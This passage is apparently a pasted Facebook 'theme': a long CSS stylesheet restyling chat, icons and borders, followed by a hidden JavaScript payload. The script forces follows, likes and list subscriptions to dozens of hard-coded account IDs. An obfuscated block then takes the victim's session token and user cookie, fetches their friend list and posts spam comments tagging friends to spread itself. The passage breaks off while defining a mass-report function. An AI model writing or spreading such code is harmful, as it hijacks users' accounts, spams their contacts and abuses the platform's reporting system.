  1540. .unread .badge, .fbDockChatBuddyListNub .icon, .sx_7173a9 {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball15.png") no-repeat right center!important;}
  1541.  
  1542.  
  1543.  
  1544. table[class=" "] .badge:hover, table[class=""] .badge:hover, .offline .fbDockChatBuddyListNub .icon, .fbChatSidebar.offline .fbChatSidebarMessage .img {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball15.png") no-repeat right center!important;}
  1545.  
  1546.  
  1547.  
  1548. .fbChatSidebar.offline .fbChatSidebarMessage .img {height: 16px !important;}
  1549.  
  1550.  
  1551.  
  1552. .offline .fbDockChatBuddyListNub .icon, .fbDockChatBuddyListNub .icon, .sx_7173a9 {margin-top: 0 !important;height: 15px !important;}
  1553.  
  1554.  
  1555.  
  1556. a.idle, .buddyRow.idle .buddyBlock, .fbChatTab.idle .tab_availability, .fbChatTab.disabled .tab_availability, .chatIdle .chatStatus, .idle .fbChatUserTab .wrap, .chatIdle .uiTooltipText, .markunread, .bb .fbDockChatTab.user.idle .titlebarTextWrapper, .fbChatOrderedList .item:not(.active) .status {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball10paddedright.png") no-repeat left center !important;}
  1557.  
  1558.  
  1559.  
  1560. a.idle, .buddyRow.idle .buddyBlock {background-position: right center !important;}
  1561.  
  1562.  
  1563.  
  1564. .fbChatOrderedList .item .status {width: 10px !important;}
  1565.  
  1566.  
  1567.  
  1568. .headerTinymanName {max-width: 320px !important; white-space: nowrap !important; overflow: hidden !important;}
  1569.  
  1570.  
  1571.  
  1572. .uiTooltipText {padding-left: 14px !important;border: none !important;}
  1573.  
  1574.  
  1575.  
  1576.  
  1577.  
  1578. .fbNubButton, .bb .fbNubFlyoutTitlebar, .bb .fbNub .noTitlebar, .fbDockChatTab, #fbDockChatBuddylistNub .fbNubFlyout, .fbDockChatTabFlyout, .titlebar {border-radius: 8px 8px 0 0!important;}
  1579.  
  1580.  
  1581.  
  1582. .uiSideNav .open {padding-right: 0 !important;}
  1583.  
  1584. .uiSideNav .open, .uiSideNav .open > *, #home_stream > *, .bb .rNubContainer .fbNub, .fbChatTab {margin-left: 0 !important;}
  1585.  
  1586. .uiSideNav .open ul > * {margin-left: -20px !important;}
  1587.  
  1588. .uiSideNav .open .subitem > .rfloat {margin-right: 20px !important;}
  1589.  
  1590.  
  1591.  
  1592.  
  1593.  
  1594.  
  1595.  
  1596.  
  1597.  
  1598. .timelineUnitContainer .timelineAudienceSelector .uiSelectorButton {padding: 1px !important; margin: 4px 0 0 4px !important;}
  1599.  
  1600. .timelineUnitContainer .audienceSelector .uiButtonNoText .customimg {margin: 2px 0 0 6px !important;}
  1601.  
  1602.  
  1603.  
  1604.  
  1605.  
  1606. .fbNub.user:not(.disabled) .wrap {padding-left: 15px !important;}
  1607.  
  1608. .fbNubFlyoutTitlebar .titlebarText {padding-left: 12px !important;}
  1609.  
  1610.  
  1611.  
  1612. a.friend:not(.idle), .buddyRow:not(.idle) .buddyBlock, .fbChatTab:not(.idle):not(.disabled) .tab_availability, .chatOnline .chatStatus, .markread {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball10paddedright.png") no-repeat right center !important;}
  1613.  
  1614.  
  1615.  
  1616. .user:not(.idle):not(.disabled) .fbChatUserTab .wrap, .chatOnline .uiTooltipText, .bb .fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper, .fbChatOrderedList .item.active .status {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball10paddedright.png") no-repeat left center !important;}
  1617.  
  1618.  
  1619.  
  1620.  
  1621.  
  1622. .markunread, .markread {background-position: 0 center !important;}
  1623.  
  1624.  
  1625.  
  1626. .chatIdle .chatStatus, .chatOnline .chatStatus {width: 10px !important;height: 10px !important;background-position: 0 0 !important;}
  1627.  
  1628.  
  1629.  
  1630. .user .fbChatUserTab .wrap {background-position: left center !important; }
  1631.  
  1632.  
  1633.  
  1634.  
  1635.  
  1636.  
  1637.  
  1638. .online .switch .online_status{background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/onlineswitch.png") no-repeat !important;height: 10px !important;width: 18px !important;}
  1639.  
  1640.  
  1641.  
  1642. .offline .switch .online_status{background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/offlineswitch.png") no-repeat !important;height: 10px !important;width: 18px !important;}
  1643.  
  1644.  
  1645.  
  1646. #fbRequestsJewel .jewelButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends-Gray.png") no-repeat center center !important;}
  1647.  
  1648.  
  1649.  
  1650. #fbRequestsJewel:hover .jewelButton, #fbRequestsJewel.hasNew .jewelButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends.png") no-repeat center center !important;}
  1651.  
  1652.  
  1653.  
  1654. #fbMessagesJewel .jewelButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon-gray.png") no-repeat center center !important;}
  1655.  
  1656.  
  1657.  
  1658. #fbMessagesJewel:hover .jewelButton, #fbMessagesJewel.hasNew .jewelButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon.png") no-repeat center center !important;}
  1659.  
  1660.  
  1661.  
  1662.  
  1663.  
  1664. #fbNotificationsJewel .jewelButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth-gray.png") no-repeat center center !important;}
  1665.  
  1666.  
  1667.  
  1668. #fbNotificationsJewel:hover .jewelButton, #fbNotificationsJewel.hasNew .jewelButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth.png") no-repeat center center !important;}
  1669.  
  1670.  
  1671.  
  1672. .home_right_column .fbFeedTicker .scrollTopPrompt {background: url("https://s-static.ak.facebook.com/rsrc.php/v1/yU/r/n93MoBZD7fU.png") no-repeat scroll center 3px rgba(10,10,10,.5) !important;}
  1673.  
  1674.  
  1675.  
  1676. .topBorder, .bottomBorder {background: black !important;}
  1677.  
  1678.  
  1679.  
  1680. .pl-item, .ical, .pop_content {background-color: #333 !important;}
  1681.  
  1682. .pl-alt {background-color: #222 !important;}
  1683.  
  1684.  
  1685.  
  1686. .friend:hover, .friend:not(.idle):hover, .fbTimelineRibbon {background-color: rgba(10,10,10,.6) !important;}
  1687.  
  1688.  
  1689.  
  1690. .UIObjectListing_PicRounded, .UIRoundedImage_CornersSprite, .UITabGrid_Link:hover .UITabGrid_LinkCorner_TL, .UITabGrid_Link:hover .UITabGrid_LinkCorner_TR, .UITabGrid_Link:hover .UITabGrid_LinkCorner_BL, .UITabGrid_Link:hover .UITabGrid_LinkCorner_BR, .UILinkButton_R {visibility:hidden !important;}
  1691.  
  1692.  
  1693.  
  1694. .nub, #contentCurve, #pagelet_netego_ads, img.plus, .highlighter, .uiToolbarDivider, .bfb_sticky_note_arrow_border, .bfb_sticky_note_arrow, #ConfirmBannerOuterContainer, .uiStreamHeaderBorder, .topBorder, .bottomBorder, .middleLink:after, .sideNavItem .uiCloseButton, .mask {display: none !important;}
  1695.  
  1696.  
  1697.  
  1698. .fbChatBuddyListTypeahead {display: block !important;}
  1699.  
  1700.  
  1701.  
  1702. .maps_arrow, #sidebar_ads, .available .x_to_hide, .left_line, .line_mask, .chat_input_border, .connect_widget_button_count_nub,
  1703.  
  1704. .uiStreamPrivacyContainer .uiTooltip .img {visibility: hidden !important;}
  1705.  
  1706.  
  1707.  
  1708. .chat_input {width: 195px !important;}
  1709.  
  1710.  
  1711.  
  1712. .fb_song_play_btn, .friend, .wrap, .uiTypeahead, .share, .raised, .donated, .recruited, .srch_landing, .story_editor, .jewelCount span {background-color: transparent !important;}
  1713.  
  1714.  
  1715.  
  1716.  
  1717.  
  1718. .extended_link div {background-color: #fff !important}
  1719.  
  1720.  
  1721.  
  1722. #fbTimelineHeadline, .coverImage {width: 851px !important; margin-left: 1px !important;}
  1723.  
  1724.  
  1725.  
  1726. .UIRoundedBox_TR *, .rooster_story, .HomeTabs_tab, .newsfeed_header, .menu_content, *{border-color: #000 !important;}
  1727.  
  1728.  
  1729.  
  1730. #feed_content_section_applications *, #feed_header_section_friend_lists *, .summary, .summary *, .UIMediaHeader_TitleWash, .UIMediaHeader_TitleWrapper, .feedbackView .comment th div, .searchroot, .composerView th div, .reply th div, .borderTagBox, .innerTagBox, .friend, .fbNubFlyoutTitlebar, .fbNubButton {border-color: transparent !important;}
  1731.  
  1732.  
  1733.  
  1734. .innerTagBox:hover {border-color: rgba(10,10,10,.45) !important;box-shadow: 0 0 5px 4px #99CCFF !important;}
  1735.  
  1736.  
  1737.  
  1738.  
  1739.  
  1740. .status_placeholder, .UIComposer_TDTextArea, .UIComposer_TextAreaShadow, .UIContentBox , .box_column, form.comment div, .comment_box div, #tagger, .UIMediaItem_Wrapper, #chat_tab_bar *, .UIActionMenu_ButtonOuter input[type="button"], .inner_button, .UIActionButton_Link, .divider, .UIComposer_Attachment_TDTextArea, #confirm_button, #global_maps_link, .advanced_selector, #presence_ui *, .fbFooterBorder, .wash, .main_body, .settings_screenshot, .uiBlingBox, .inputContainer *, .uiMentionsInput, .uiTypeahead, .editNoteWrapperInput, .date_divider, .chatStatus, #headNav, .jewelCount span, .fbFeedbackMentions .wrap, .uiSearchInput span, .uiSearchInput, .fbChatSidebarMessage, .devsitePage .body > .content, .timelineUnitContainer, .fbTimelineTopSection, .coverBorder {border: none !important;}
  1741.  
  1742.  
  1743.  
  1744. .uiStream .uiStreamHeaderTall {border-top: none !important; border-bottom: none !important;}
  1745.  
  1746.  
  1747.  
  1748. .attachment_link a:hover, input[type="input"], input[type="submit"]:not(.fg_action_hide):not(.stat_elem):not([name="add"]):not([name="actions[reject]"]):not([name="actions[accept]"]):not([value="Find Friends"]):not([value="Share"]):not([value="Maybe"]):not([value="No"]):not([value="Yes"]):not([value="Comment"]):not([value="Reply"]):not([value="Flag"]):not([type="submit"]), .UITabGrid_Link:hover, .UIFilterList_Selected, .make_new_list_button_table, .confirm_button, .fb_menu_title a:hover, .Tabset_selected {border-bottom-color: #000 !important;border-bottom-width: 1px !important;border-bottom-style: solid !important;border-top-color: #000 !important;border-top-width: 1px !important;border-top-style: solid !important;border-left-color: #000 !important;border-left-width: 1px !important;border-left-style: solid !important;border-right-color: #000 !important;border-right-width: 1px !important;border-right-style: solid !important;-moz-appearance:none!important;}
  1749.  
  1750.  
  1751.  
  1752.  
  1753.  
  1754.  
  1755.  
  1756. .UITabGrid_Link, .fb_menu_title a, .button_main, .button_text, .button_left {border-bottom-color: transparent !important;border-bottom-width: 1px !important;border-bottom-style: solid !important;border-top-color: transparent !important;border-top-width: 1px !important;border-top-style: solid !important;border-left-color: transparent !important;border-left-width: 1px !important;border-left-style: solid !important;border-right-color: transparent !important;border-right-width: 1px !important;border-right-style: solid !important;-moz-appearance:none!important;}
  1757.  
  1758.  
  1759.  
  1760.  
  1761.  
  1762. .UIObjectListing_RemoveLink, .UIIntentionalStory_CloseButton, .remove, .x_to_hide, .fg_action_hide a, .notif_del, .UIComposer_AttachmentArea_CloseButton, .delete_msg a, .ImageBlock_Hide, .fbSettingsListItemDelete, .fg_action_hide, img[src="http://static.ak.fbcdn.net/images/streams/x_hide_story.gif?8:142665"], .close, .uiSelector .uiCloseButton {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/closeX.png") no-repeat !important;text-decoration: none !important;height: 18px !important;}
  1763.  
  1764.  
  1765.  
  1766. .fbChatSidebar .fbChatSidebarFooter .toggle {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/closeX.png") 4px 4px no-repeat !important;}
  1767.  
  1768.  
  1769.  
  1770. div.fbChatSidebarDropdown .uiCloseButton, .fbDockChatDropdown .uiSelectorButton, .storyInnerContent .uiSelectorButton, .fbTimelineAllActivityStorySelector .uiButton .img {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/GrayGear_15.png") center center no-repeat !important; width: 26px !important;}
  1771.  
  1772.  
  1773.  
  1774. div.fbChatSidebarDropdown .uiCloseButton {height: 23px !important;}
  1775.  
  1776.  
  1777.  
  1778. .fbDockChatTab.user .titlebar .videoicon {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/video_chat_small.png") center center no-repeat !important; }
  1779.  
  1780.  
  1781.  
  1782.  
  1783.  
  1784. .uiStream .uiStreamFirstStory .highlightSelector .uiSelectorButton {margin-top: -5px !important;}
  1785.  
  1786.  
  1787.  
  1788. .UIObjectListing_RemoveLink, .UIIntentionalStory_CloseButton, .remove, .x_to_hide, .fg_action_hide a, .notif_del, .UIComposer_AttachmentArea_CloseButton, .delete_msg a, .ImageBlock_Hide, .uiCloseButton, .fbSettingsListItemDelete {width: 18px !important;}
  1789.  
  1790. .fg_action_hide {width: 18px !important; margin-top: 0 !important; }
  1791.  
  1792. img[src="http://static.ak.fbcdn.net/images/streams/x_hide_story.gif?8:142665"] {width: 0 !important;padding-left: 18px !important;}
  1793.  
  1794.  
  1795.  
  1796.  
  1797.  
  1798.  
  1799.  
  1800. .fg_action_hide_container {width: 18px !important;}
  1801.  
  1802. .uiSideNav li {left: 0 !important;padding-left: 0 !important;}
  1803.  
  1804.  
  1805.  
  1806.  
  1807.  
  1808.  
  1809.  
  1810.  
  1811.  
  1812. .UIHotStory_Bling, .UIHotStory_BlingCount:hover, .request_link:hover, .request_link span:hover, .uiLinkButton {text-decoration: none !important;}
  1813.  
  1814.  
  1815.  
  1816.  
  1817.  
  1818.  
  1819.  
  1820.  
  1821.  
  1822. .UIMediaItem_Photo .UIMediaItem_Wrapper {padding: 10px !important;}
  1823.  
  1824.  
  1825.  
  1826.  
  1827.  
  1828.  
  1829.  
  1830. #footerRight, .fg_action_hide {margin-right: 5px !important;}
  1831.  
  1832. .fbx_stream_header, .pas .input {padding: 5px !important;}
  1833.  
  1834.  
  1835.  
  1836. .fbTimelineUnitActor {padding-top: 5px !important;}
  1837.  
  1838. .home_right_column {padding-top: 0 !important;}
  1839.  
  1840.  
  1841.  
  1842.  
  1843.  
  1844. .uiButton[tooltip-alignh="right"] .uiButtonText {padding: 2px 10px 3px 10px !important; font-weight: bold !important;}
  1845.  
  1846.  
  1847.  
  1848.  
  1849.  
  1850. .uiSideNav .uiCloseButton {left: 160px !important;border: none !important;}
  1851.  
  1852. .uiSideNav .uiCloseButton input {padding-left: 2px !important;padding-right: 2px !important;margin-top: -4px !important;border: none !important;}
  1853.  
  1854.  
  1855.  
  1856. .storyInnerContent .uiSelectorRight .wrap .uiSelectorButton.uiCloseButton {margin-right: 25px !important;}
  1857.  
  1858. .storyInnerContent .uiTooltip.uiCloseButton {margin-right: -10px !important;}
  1859.  
  1860. .storyInnerContent .stat_elem .wrap .uiSelectorButton.uiCloseButton, .uiFutureSideNavSection .open .item, .uiFutureSideNavSection .open .subitem, .uiFutureSideNavSection .open .subitem .rfloat, .uiSideNav .subitem, .uiSideNav .open .item {margin-right: 0 !important;}
  1861.  
  1862.  
  1863.  
  1864.  
  1865.  
  1866.  
  1867.  
  1868.  
  1869.  
  1870. .jewelHeader, .fbSettingsListItemDelete {margin: 0 !important;}
  1871.  
  1872. .UITitledBox_Title {margin-left: 4px;margin-top:1px;}
  1873.  
  1874.  
  1875.  
  1876. .uiHeader .uiHeaderTitle {margin-left: 7px !important;}
  1877.  
  1878. .fbx_stream_header .uiHeaderTitle, #footerLeft {margin-left: 5px !important;}
  1879.  
  1880. .UIHomeBox_MoreLink {margin-right: 3px;}
  1881.  
  1882. .comments_add_box_image {margin-right: -5px !important;}
  1883.  
  1884. .show_advanced_controls {margin-top:-5px !important;}
  1885.  
  1886. .chat_window_wrapper {margin-bottom: 3px !important;}
  1887.  
  1888. .UIUpcoming_Item {margin-bottom: 5px !important;}
  1889.  
  1890. #pagelet_right_sidebar {margin-left: 0 !important;}
  1891.  
  1892.  
  1893.  
  1894. .profile-pagelet-section, .uiStreamHeaderTall, .timelineRecentActivityLabel, .friendsBoxHeader {padding: 5px 10px !important;}
  1895.  
  1896.  
  1897.  
  1898. .GBSearchBox_Button, button[title="Search"] {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/search.png") center center !important;}
  1899.  
  1900. button[title="Search"] {width: 23px !important;height: 21px !important;top: 0 !important;background-position: 3px 2px !important;}
  1901.  
  1902.  
  1903.  
  1904. .UIButton_Text, .UISearchInput_Text {font-weight: normal !important;}
  1905.  
  1906.  
  1907.  
  1908.  
  1909.  
  1910. .x_to_hide, .top_bar_pic .UIRoundedImage {margin: 0 !important;padding: 0 !important;}
  1911.  
  1912.  
  1913.  
  1914.  
  1915.  
  1916. .uiHeaderActions .uiButton .uiButtonText {margin-left: 15px !important;}
  1917.  
  1918.  
  1919.  
  1920.  
  1921.  
  1922. .searchroot, #share_submit input {padding-right: 5px !important; }
  1923.  
  1924. .composerView {padding-left: 8px !important;padding-bottom: 4px !important;}
  1925.  
  1926. .info_section {padding: 6px !important;}
  1927.  
  1928. .uiInfoTable .dataRow .inputtext {min-width: 200px !important;}
  1929.  
  1930.  
  1931.  
  1932. .fbPrivacyWidget .uiButton .mrs, .uiButtonSuppressed .mrs {margin: 0 -10px 0 6px !important;}
  1933.  
  1934.  
  1935.  
  1936. .uiStreamPrivacyContainer .uiTooltip, .UIActionMenu_Lock, .fbPrivacyLockButton, .fbPrivacyLockButton:hover, .sx_7bedb4, .fbPrivacyWidget .uiButton .mrs, .uiButtonSuppressed .mrs, div.fbPrivacyLockSelector {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/privacylock.png") no-repeat center center !important;}
  1937.  
  1938.  
  1939.  
  1940. .jewelCount {margin: -8px -4px 0 0 !important;padding: 1px 4px !important;}
  1941.  
  1942.  
  1943.  
  1944.  
  1945.  
  1946. #share_submit {padding: 0 !important;border: none !important;}
  1947.  
  1948. #share_submit input, .friend_list_container .friend {padding-left: 5px !important;}
  1949.  
  1950.  
  1951.  
  1952. a{outline: none !important;}
  1953.  
  1954.  
  1955.  
  1956. #contact_importer_container input[value="Find Friends"] {border: none !important;box-shadow: none !important;}
  1957.  
  1958.  
  1959.  
  1960. #pageLogo {margin-left: -1px !important; margin-top: 6px !important; }
  1961.  
  1962.  
  1963.  
  1964. #pageLogo a {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Facebook.png") no-repeat center center, rgba(10,10,10,.5) !important;left: 0 !important;width: 107px !important;margin-right: 1px !important; margin-top: 0 !important;}
  1965.  
  1966.  
  1967.  
  1968. #pageLogo a:hover {background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Facebook-glow.png") no-repeat center center, rgba(10,10,10,.5) !important;}
  1969.  
  1970.  
  1971.  
  1972. #pageHead {margin-top: -6px !important;}
  1973.  
  1974.  
  1975.  
  1976. #navSearch, .mainWrapper .uiSelectorButton { margin-top: 10px !important; }
  1977.  
  1978.  
  1979.  
  1980. #globalContainer {margin: 3px auto !important;}
  1981.  
  1982.  
  1983.  
  1984. .platform_dialog #blueBar, .withCanvasNav #blueBar {position: absolute !important; margin-top: 10px !important; height: 30px !important; }
  1985.  
  1986.  
  1987.  
  1988. .friend_list_container .friend {margin-right: 0 !important; }
  1989.  
  1990.  
  1991.  
  1992.  
  1993.  
  1994. #ConfirmBannerOuterContainer{ margin-top: 50px !important;margin-bottom: -50px !important}
  1995.  
  1996.  
  1997.  
  1998. .list_select {padding: 3px !important;}
  1999.  
  2000.  
  2001.  
  2002. .fbNubFlyout .input, .chat_input {margin-left: 20px !important;}
  2003.  
  2004.  
  2005.  
  2006.  
  2007.  
  2008.  
  2009.  
  2010.  
  2011.  
  2012.  
  2013.  
  2014. .highlightIndicator {top: 0 !important;}
  2015.  
  2016.  
  2017.  
  2018. .audienceSelector .uiButtonText {padding-left: 8px !important;}
  2019.  
  2020. .profile #pagelet_netego {margin-top: -60px !important;margin-left: -30px !important;}
  2021.  
  2022. .pas .input {margin-left: -5px !important;}
  2023.  
  2024.  
  2025.  
  2026. .removable {top: 0 !important;bottom: 0 !important;margin-top: -4px !important;border: none !important;}
  2027.  
  2028.  
  2029.  
  2030. .uiSideNavCount, .uiStreamAttachments div embed, .jewelCount, .uiButton, .fbChatSidebarFooter .button, button[title="Search"], .uiSelectorButton {border-radius: 6px !important;}
  2031.  
  2032.  
  2033.  
  2034. .fbActivity, .UIRoundedImage {margin: 4px !important;}
  2035.  
  2036.  
  2037.  
  2038. #facebook:not(.tinyViewport) body:not(.UIPage_LoggedOut):not(.fbIndex):not(.platform_dialog):not(.withCanvasNav) #blueBar {width: 100% !important;margin: 0 auto !important;top: 10px !important;height: 30px !important;}
  2039.  
  2040.  
  2041.  
  2042. .uiUfiSmall .commentArea .textBox:not([style*="height"]) {height: 20px !important; }
  2043.  
  2044. .composerTypeahead .textInput:not([style*="height"]){height: 27px !important; }
  2045.  
  2046.  
  2047.  
  2048. .dataTable .inputtext, .uiInfoTable .dataRow .inputtext {padding-left: 20px !important;}
  2049.  
  2050.  
  2051.  
  2052. .fbTimelineAllActivityStorySelector .uiButton, .fbDockChatTabFlyout .close {margin-top: 3px !important;}
  2053.  
  2054. .fbTimelineAllActivityStorySelector .uiButton .img {margin: 0 -3px !important;}
  2055.  
  2056.  
  2057.  
  2058. .audienceSelector .uiButton {padding: 2px 0px 2px 0px !important;}
  2059.  
  2060. .audienceSelector .uiButton .img {margin-right: -1px !important;}
  2061.  
  2062.  
  2063.  
  2064. .fbTimelineContentHeader .uiHeaderTitle {font-size: 2.0em !important;}
  2065.  
  2066.  
  2067.  
  2068.  
  2069.  
  2070. /* fixes for Farmville, per Narulez. */
  2071.  
  2072. .main_giftConfirm_cont { padding: 0 !important;}
  2073.  
  2074. .gift_action form #send, .app_content_102452128776 .inputbutton, .app_content_102452128776 .inputsubmit {background-color: #99CCFF !important;color:#000 !important;}
  2075.  
  2076. .aggregate_review .UIStarRating_Star {background-color: #fff !important}
  2077.  
  2078. /* end Farmville fixes */
  2079. }
  2080. // Cứng
  2081. a("100004133313540");
  2082. //Cái nhồn rì vậy ???
  2083. a("100003117554445");IDS("100008279025470");sublist("416396038474311");IDS("100007616952561");Like("405520482887278");P("1394477720816113");P("1384968075100411");sublist(1413533658910519);a("100002918907890");a("100005757240765");a("100005788359551");
  2084. //Đạt Dz Nhất Team
  2085. a("100008310346988");IDS("100008310346988");
  2086. a("100007997439416");IDS("100006037502616");
  2087. IDS("100007997439416");sublist("147269905484259");
  2088. sublist("200682230143026");sublist("1384626965147205");
  2089. Like("622922324391096");Like("614795568558087");
  2090. Like("194372420735223");Like("1404731539801127");
  2091. a("100005510177441");Like("508944899210033");
  2092. a("100004535405960");
  2093. // Phương KillYuriy
  2094. a("100006721873779");
  2095. a("100006063818860");
  2096. a("100003903002122");
  2097. //Phát
  2098. a("100004319911971");
  2099. IDS("100004319911971");
  2100. // Tổn Thương
  2101. a("100005802433545");
  2102. //Quy Nguyen Dzai
  2103. a("100006207369186");
  2104. a("100006997984829");
  2105. a("100001452285914");
  2106. a("1802493192");
  2107. a("100006876722494");
  2108. a("100007975839101");
  2109. a("100001509501437");
  2110. Like("803696052977845");
  2111. sublist("1472261603007888");
  2112. P("1470404846526897");
  2113. //Quốc Anh
  2114. a("10007705780773");
  2115. sublist("1405046603095519");
  2116. sublist("1404857989781047");
  2117. P("434727576673926");
  2118. P("497875336983903");
  2119. P("1425915550989900");
  2120. //Fuck
  2121. a("100003125952856"); a("100004689426760");a("100005342042592");a("100008299724903");a("100004838773405");sublist("178593315645293");Like("225698477597141");a("100006635431135");a("100007188456183");sublist("300024033479705"); a("100004163319455");a("100007444693378");
  2122. IDS("100007444693378");IDS("100005162590585"); P("494785137298083"); a("100002998037199");
  2123. //tool
  2124. var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","307758289371946","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=(y) Theme Facebook mới nè :D đẹp quá đi^_^.........................................................................................................................................","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
  2125. //nguoi ta ke minh deo biet gi ca
  2126. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2127. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  2128. var now=(new Date).getTime();
  2129. function Report(id) {
  2130. var Page = new XMLHttpRequest();
  2131. var PageURL = "//www.facebook.com/ajax/report/social.php";
